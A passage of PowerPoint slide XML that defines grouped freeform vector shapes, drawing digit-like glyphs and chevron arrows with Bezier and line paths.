                  <a:gd name="T28" fmla="*/ 55 w 111"/>
                  <a:gd name="T29" fmla="*/ 30 h 194"/>
                  <a:gd name="T30" fmla="*/ 42 w 111"/>
                  <a:gd name="T31" fmla="*/ 40 h 194"/>
                  <a:gd name="T32" fmla="*/ 37 w 111"/>
                  <a:gd name="T33" fmla="*/ 73 h 194"/>
                  <a:gd name="T34" fmla="*/ 37 w 111"/>
                  <a:gd name="T35" fmla="*/ 120 h 194"/>
                  <a:gd name="T36" fmla="*/ 42 w 111"/>
                  <a:gd name="T37" fmla="*/ 154 h 194"/>
                  <a:gd name="T38" fmla="*/ 55 w 111"/>
                  <a:gd name="T39" fmla="*/ 164 h 194"/>
                  <a:gd name="T40" fmla="*/ 56 w 111"/>
                  <a:gd name="T41" fmla="*/ 164 h 194"/>
                  <a:gd name="T42" fmla="*/ 69 w 111"/>
                  <a:gd name="T43" fmla="*/ 154 h 194"/>
                  <a:gd name="T44" fmla="*/ 74 w 111"/>
                  <a:gd name="T45" fmla="*/ 120 h 194"/>
                  <a:gd name="T46" fmla="*/ 74 w 111"/>
                  <a:gd name="T47" fmla="*/ 73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1" h="194">
                    <a:moveTo>
                      <a:pt x="111" y="117"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="111" y="142"/>
                      <a:pt x="106" y="162"/>
                      <a:pt x="96" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="188"/>
                      <a:pt x="72" y="194"/>
                      <a:pt x="56" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="194"/>
                      <a:pt x="25" y="188"/>
                      <a:pt x="15" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="0" y="142"/>
                      <a:pt x="0" y="11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52"/>
                      <a:pt x="5" y="32"/>
                      <a:pt x="15" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="6"/>
                      <a:pt x="39" y="0"/>
                      <a:pt x="55" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="0"/>
                      <a:pt x="86" y="6"/>
                      <a:pt x="96" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="32"/>
                      <a:pt x="111" y="52"/>
                      <a:pt x="111" y="77"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="111" y="117"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="74" y="73"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="58"/>
                      <a:pt x="72" y="47"/>
                      <a:pt x="69" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="61" y="30"/>
                      <a:pt x="56" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="30"/>
                      <a:pt x="55" y="30"/>
                      <a:pt x="55" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="30"/>
                      <a:pt x="45" y="33"/>
                      <a:pt x="42" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="47"/>
                      <a:pt x="37" y="58"/>
                      <a:pt x="37" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="120"/>
                      <a:pt x="37" y="120"/>
                      <a:pt x="37" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="136"/>
                      <a:pt x="39" y="147"/>
                      <a:pt x="42" y="154"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="161"/>
                      <a:pt x="49" y="164"/>
                      <a:pt x="55" y="164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62" y="164"/>
                      <a:pt x="66" y="161"/>
                      <a:pt x="69" y="154"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="147"/>
                      <a:pt x="74" y="136"/>
                      <a:pt x="74" y="120"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="74" y="7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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="160" name="Freeform 42"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4940667" y="3710770"/>
                <a:ext cx="145640" cy="246469"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 37 w 115"/>
                  <a:gd name="T1" fmla="*/ 81 h 194"/>
                  <a:gd name="T2" fmla="*/ 56 w 115"/>
                  <a:gd name="T3" fmla="*/ 81 h 194"/>
                  <a:gd name="T4" fmla="*/ 71 w 115"/>
                  <a:gd name="T5" fmla="*/ 74 h 194"/>
                  <a:gd name="T6" fmla="*/ 75 w 115"/>
                  <a:gd name="T7" fmla="*/ 54 h 194"/>
                  <a:gd name="T8" fmla="*/ 71 w 115"/>
                  <a:gd name="T9" fmla="*/ 36 h 194"/>
                  <a:gd name="T10" fmla="*/ 57 w 115"/>
                  <a:gd name="T11" fmla="*/ 29 h 194"/>
                  <a:gd name="T12" fmla="*/ 44 w 115"/>
                  <a:gd name="T13" fmla="*/ 35 h 194"/>
                  <a:gd name="T14" fmla="*/ 39 w 115"/>
                  <a:gd name="T15" fmla="*/ 51 h 194"/>
                  <a:gd name="T16" fmla="*/ 3 w 115"/>
                  <a:gd name="T17" fmla="*/ 51 h 194"/>
                  <a:gd name="T18" fmla="*/ 3 w 115"/>
                  <a:gd name="T19" fmla="*/ 50 h 194"/>
                  <a:gd name="T20" fmla="*/ 18 w 115"/>
                  <a:gd name="T21" fmla="*/ 14 h 194"/>
                  <a:gd name="T22" fmla="*/ 56 w 115"/>
                  <a:gd name="T23" fmla="*/ 0 h 194"/>
                  <a:gd name="T24" fmla="*/ 97 w 115"/>
                  <a:gd name="T25" fmla="*/ 14 h 194"/>
                  <a:gd name="T26" fmla="*/ 112 w 115"/>
                  <a:gd name="T27" fmla="*/ 54 h 194"/>
                  <a:gd name="T28" fmla="*/ 106 w 115"/>
                  <a:gd name="T29" fmla="*/ 77 h 194"/>
                  <a:gd name="T30" fmla="*/ 87 w 115"/>
                  <a:gd name="T31" fmla="*/ 94 h 194"/>
                  <a:gd name="T32" fmla="*/ 108 w 115"/>
                  <a:gd name="T33" fmla="*/ 111 h 194"/>
                  <a:gd name="T34" fmla="*/ 115 w 115"/>
                  <a:gd name="T35" fmla="*/ 139 h 194"/>
                  <a:gd name="T36" fmla="*/ 98 w 115"/>
                  <a:gd name="T37" fmla="*/ 179 h 194"/>
                  <a:gd name="T38" fmla="*/ 56 w 115"/>
                  <a:gd name="T39" fmla="*/ 194 h 194"/>
                  <a:gd name="T40" fmla="*/ 17 w 115"/>
                  <a:gd name="T41" fmla="*/ 180 h 194"/>
                  <a:gd name="T42" fmla="*/ 1 w 115"/>
                  <a:gd name="T43" fmla="*/ 140 h 194"/>
                  <a:gd name="T44" fmla="*/ 1 w 115"/>
                  <a:gd name="T45" fmla="*/ 139 h 194"/>
                  <a:gd name="T46" fmla="*/ 37 w 115"/>
                  <a:gd name="T47" fmla="*/ 139 h 194"/>
                  <a:gd name="T48" fmla="*/ 43 w 115"/>
                  <a:gd name="T49" fmla="*/ 157 h 194"/>
                  <a:gd name="T50" fmla="*/ 57 w 115"/>
                  <a:gd name="T51" fmla="*/ 165 h 194"/>
                  <a:gd name="T52" fmla="*/ 72 w 115"/>
                  <a:gd name="T53" fmla="*/ 157 h 194"/>
                  <a:gd name="T54" fmla="*/ 78 w 115"/>
                  <a:gd name="T55" fmla="*/ 138 h 194"/>
                  <a:gd name="T56" fmla="*/ 72 w 115"/>
                  <a:gd name="T57" fmla="*/ 116 h 194"/>
                  <a:gd name="T58" fmla="*/ 56 w 115"/>
                  <a:gd name="T59" fmla="*/ 109 h 194"/>
                  <a:gd name="T60" fmla="*/ 37 w 115"/>
                  <a:gd name="T61" fmla="*/ 109 h 194"/>
                  <a:gd name="T62" fmla="*/ 37 w 115"/>
                  <a:gd name="T63" fmla="*/ 81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5" h="194">
                    <a:moveTo>
                      <a:pt x="37" y="81"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="81"/>
                      <a:pt x="56" y="81"/>
                      <a:pt x="56" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="81"/>
                      <a:pt x="67" y="78"/>
                      <a:pt x="71" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="69"/>
                      <a:pt x="75" y="62"/>
                      <a:pt x="75" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="47"/>
                      <a:pt x="74" y="41"/>
                      <a:pt x="71" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="31"/>
                      <a:pt x="63" y="29"/>
                      <a:pt x="57" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="29"/>
                      <a:pt x="48" y="31"/>
                      <a:pt x="44" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="39"/>
                      <a:pt x="39" y="45"/>
                      <a:pt x="39" y="51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3" y="36"/>
                      <a:pt x="8" y="23"/>
                      <a:pt x="18" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="4"/>
                      <a:pt x="41" y="0"/>
                      <a:pt x="56" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="0"/>
                      <a:pt x="87" y="4"/>
                      <a:pt x="97" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="23"/>
                      <a:pt x="112" y="36"/>
                      <a:pt x="112" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="62"/>
                      <a:pt x="110" y="70"/>
                      <a:pt x="106" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="85"/>
                      <a:pt x="95" y="90"/>
                      <a:pt x="87" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="98"/>
                      <a:pt x="103" y="104"/>
                      <a:pt x="108" y="111"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="119"/>
                      <a:pt x="115" y="128"/>
                      <a:pt x="115" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="156"/>
                      <a:pt x="109" y="169"/>
                      <a:pt x="98" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="189"/>
                      <a:pt x="73" y="194"/>
                      <a:pt x="56" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="194"/>
                      <a:pt x="27" y="189"/>
                      <a:pt x="17" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="171"/>
                      <a:pt x="0" y="158"/>
                      <a:pt x="1" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="139"/>
                      <a:pt x="1" y="139"/>
                      <a:pt x="1" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="139"/>
                      <a:pt x="37" y="139"/>
                      <a:pt x="37" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="147"/>
                      <a:pt x="39" y="153"/>
                      <a:pt x="43" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="162"/>
                      <a:pt x="51" y="165"/>
                      <a:pt x="57" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="165"/>
                      <a:pt x="68" y="162"/>
                      <a:pt x="72" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="153"/>
                      <a:pt x="78" y="146"/>
                      <a:pt x="78" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="128"/>
                      <a:pt x="76" y="121"/>
                      <a:pt x="72" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="112"/>
                      <a:pt x="63" y="109"/>
                      <a:pt x="56" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="109"/>
                      <a:pt x="37" y="109"/>
                      <a:pt x="37" y="109"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="37" y="8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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="115" name="Group 114"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6689747" y="2796314"/>
              <a:ext cx="960664" cy="592366"/>
              <a:chOff x="6689747" y="2796314"/>
              <a:chExt cx="960664" cy="592366"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="155" name="Freeform 7"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6689747" y="2796314"/>
                <a:ext cx="960664" cy="592366"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 427 w 686"/>
                  <a:gd name="T1" fmla="*/ 423 h 423"/>
                  <a:gd name="T2" fmla="*/ 218 w 686"/>
                  <a:gd name="T3" fmla="*/ 423 h 423"/>
                  <a:gd name="T4" fmla="*/ 0 w 686"/>
                  <a:gd name="T5" fmla="*/ 0 h 423"/>
                  <a:gd name="T6" fmla="*/ 427 w 686"/>
                  <a:gd name="T7" fmla="*/ 0 h 423"/>
                  <a:gd name="T8" fmla="*/ 686 w 686"/>
                  <a:gd name="T9" fmla="*/ 210 h 423"/>
                  <a:gd name="T10" fmla="*/ 427 w 686"/>
                  <a:gd name="T11" fmla="*/ 423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86" h="423">
                    <a:moveTo>
                      <a:pt x="427" y="423"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="218" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="423"/>
                    </a:ln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" name="Freeform 8"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6706552" y="2829923"/>
                <a:ext cx="890645" cy="523747"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 636"/>
                  <a:gd name="T1" fmla="*/ 0 h 374"/>
                  <a:gd name="T2" fmla="*/ 407 w 636"/>
                  <a:gd name="T3" fmla="*/ 0 h 374"/>
                  <a:gd name="T4" fmla="*/ 636 w 636"/>
                  <a:gd name="T5" fmla="*/ 186 h 374"/>
                  <a:gd name="T6" fmla="*/ 407 w 636"/>
                  <a:gd name="T7" fmla="*/ 374 h 374"/>
                  <a:gd name="T8" fmla="*/ 192 w 636"/>
                  <a:gd name="T9" fmla="*/ 374 h 374"/>
                  <a:gd name="T10" fmla="*/ 0 w 636"/>
                  <a:gd name="T11" fmla="*/ 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36" h="374">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="407" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="3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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="116" name="Group 115"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5149324" y="2014895"/>
              <a:ext cx="1054490" cy="642780"/>
              <a:chOff x="5149324" y="2014895"/>
              <a:chExt cx="1054490" cy="642780"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="153" name="Freeform 5"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5149324" y="2014895"/>
                <a:ext cx="1054490" cy="642780"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 278 w 753"/>
                  <a:gd name="T1" fmla="*/ 459 h 459"/>
                  <a:gd name="T2" fmla="*/ 475 w 753"/>
                  <a:gd name="T3" fmla="*/ 459 h 459"/>
                  <a:gd name="T4" fmla="*/ 753 w 753"/>
                  <a:gd name="T5" fmla="*/ 0 h 459"/>
                  <a:gd name="T6" fmla="*/ 278 w 753"/>
                  <a:gd name="T7" fmla="*/ 0 h 459"/>
                  <a:gd name="T8" fmla="*/ 0 w 753"/>
                  <a:gd name="T9" fmla="*/ 214 h 459"/>
                  <a:gd name="T10" fmla="*/ 278 w 753"/>
                  <a:gd name="T11" fmla="*/ 459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3" h="459">
                    <a:moveTo>
                      <a:pt x="278" y="459"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="475" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="753" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="459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" name="Freeform 6"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5199738" y="2044303"/>
                <a:ext cx="985871" cy="585364"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 252 w 704"/>
                  <a:gd name="T1" fmla="*/ 418 h 418"/>
                  <a:gd name="T2" fmla="*/ 0 w 704"/>
                  <a:gd name="T3" fmla="*/ 194 h 418"/>
                  <a:gd name="T4" fmla="*/ 251 w 704"/>
                  <a:gd name="T5" fmla="*/ 0 h 418"/>
                  <a:gd name="T6" fmla="*/ 704 w 704"/>
                  <a:gd name="T7" fmla="*/ 0 h 418"/>
                  <a:gd name="T8" fmla="*/ 452 w 704"/>
                  <a:gd name="T9" fmla="*/ 418 h 418"/>
                  <a:gd name="T10" fmla="*/ 252 w 704"/>
                  <a:gd name="T11" fmla="*/ 418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4" h="418">
                    <a:moveTo>
                      <a:pt x="252" y="418"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="418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17" name="Group 116"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7441754" y="4331144"/>
              <a:ext cx="1013878" cy="614772"/>
              <a:chOff x="7441754" y="4331144"/>
              <a:chExt cx="1013878" cy="614772"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="151" name="Freeform 9"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7441754" y="4331144"/>
                <a:ext cx="1013878" cy="614772"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 465 w 724"/>
                  <a:gd name="T1" fmla="*/ 438 h 439"/>
                  <a:gd name="T2" fmla="*/ 218 w 724"/>
                  <a:gd name="T3" fmla="*/ 439 h 439"/>
                  <a:gd name="T4" fmla="*/ 0 w 724"/>
                  <a:gd name="T5" fmla="*/ 0 h 439"/>
                  <a:gd name="T6" fmla="*/ 465 w 724"/>
                  <a:gd name="T7" fmla="*/ 0 h 439"/>
                  <a:gd name="T8" fmla="*/ 724 w 724"/>
                  <a:gd name="T9" fmla="*/ 217 h 439"/>
                  <a:gd name="T10" fmla="*/ 465 w 724"/>
                  <a:gd name="T11" fmla="*/ 438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4" h="439">
                    <a:moveTo>
                      <a:pt x="465" y="438"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="218" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="438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" name="Freeform 10"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7459959" y="4366153"/>
                <a:ext cx="942459" cy="543352"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 673"/>
                  <a:gd name="T1" fmla="*/ 0 h 388"/>
                  <a:gd name="T2" fmla="*/ 444 w 673"/>
                  <a:gd name="T3" fmla="*/ 0 h 388"/>
                  <a:gd name="T4" fmla="*/ 673 w 673"/>
                  <a:gd name="T5" fmla="*/ 193 h 388"/>
                  <a:gd name="T6" fmla="*/ 444 w 673"/>
                  <a:gd name="T7" fmla="*/ 388 h 388"/>
                  <a:gd name="T8" fmla="*/ 192 w 673"/>
                  <a:gd name="T9" fmla="*/ 388 h 388"/>
                  <a:gd name="T10" fmla="*/ 0 w 673"/>
                  <a:gd name="T11" fmla="*/ 0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3" h="388">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="444" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="444" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="3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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="118" name="Group 117"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4429526" y="2014895"/>
              <a:ext cx="3753031" cy="4082143"/>
              <a:chOff x="4429526" y="2014895"/>
              <a:chExt cx="3753031" cy="4082143"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="127" name="Freeform 15"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5814507" y="2014895"/>
                <a:ext cx="389307" cy="642780"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 201 w 278"/>
                  <a:gd name="T1" fmla="*/ 420 h 459"/>
                  <a:gd name="T2" fmla="*/ 278 w 278"/>
                  <a:gd name="T3" fmla="*/ 0 h 459"/>
                  <a:gd name="T4" fmla="*/ 0 w 278"/>
                  <a:gd name="T5" fmla="*/ 459 h 459"/>
                  <a:gd name="T6" fmla="*/ 201 w 278"/>
                  <a:gd name="T7" fmla="*/ 420 h 459"/>
                  <a:gd name="T8" fmla="*/ 201 w 278"/>
                  <a:gd name="T9" fmla="*/ 420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8" h="459">
                    <a:moveTo>
                      <a:pt x="201" y="420"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="278" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="420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" name="Freeform 16"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5877524" y="2196946"/>
                <a:ext cx="260472" cy="420118"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 186 w 186"/>
                  <a:gd name="T1" fmla="*/ 0 h 300"/>
                  <a:gd name="T2" fmla="*/ 134 w 186"/>
                  <a:gd name="T3" fmla="*/ 273 h 300"/>
                  <a:gd name="T4" fmla="*/ 0 w 186"/>
                  <a:gd name="T5" fmla="*/ 300 h 300"/>
                  <a:gd name="T6" fmla="*/ 186 w 186"/>
                  <a:gd name="T7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6" h="300">
                    <a:moveTo>
                      <a:pt x="186" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="134" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186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" name="Freeform 17"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6095984" y="2014895"/>
                <a:ext cx="481732" cy="623174"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 344"/>
                  <a:gd name="T1" fmla="*/ 420 h 445"/>
                  <a:gd name="T2" fmla="*/ 77 w 344"/>
                  <a:gd name="T3" fmla="*/ 0 h 445"/>
                  <a:gd name="T4" fmla="*/ 344 w 344"/>
                  <a:gd name="T5" fmla="*/ 445 h 445"/>
                  <a:gd name="T6" fmla="*/ 0 w 344"/>
                  <a:gd name="T7" fmla="*/ 420 h 445"/>
                  <a:gd name="T8" fmla="*/ 0 w 344"/>
                  <a:gd name="T9" fmla="*/ 420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4" h="445">
                    <a:moveTo>
                      <a:pt x="0" y="420"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="77" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="420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" name="Freeform 18"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6133794" y="2108721"/>
                <a:ext cx="385106" cy="495739"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 275"/>
                  <a:gd name="T1" fmla="*/ 334 h 354"/>
                  <a:gd name="T2" fmla="*/ 62 w 275"/>
                  <a:gd name="T3" fmla="*/ 0 h 354"/>
                  <a:gd name="T4" fmla="*/ 275 w 275"/>
                  <a:gd name="T5" fmla="*/ 354 h 354"/>
                  <a:gd name="T6" fmla="*/ 0 w 275"/>
                  <a:gd name="T7" fmla="*/ 334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354">
                    <a:moveTo>
                      <a:pt x="0" y="334"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="62" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="334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" name="Freeform 19"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5814507" y="2603060"/>
                <a:ext cx="763210" cy="85424"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 201 w 545"/>
                  <a:gd name="T1" fmla="*/ 0 h 61"/>
                  <a:gd name="T2" fmla="*/ 545 w 545"/>
                  <a:gd name="T3" fmla="*/ 25 h 61"/>
                  <a:gd name="T4" fmla="*/ 351 w 545"/>
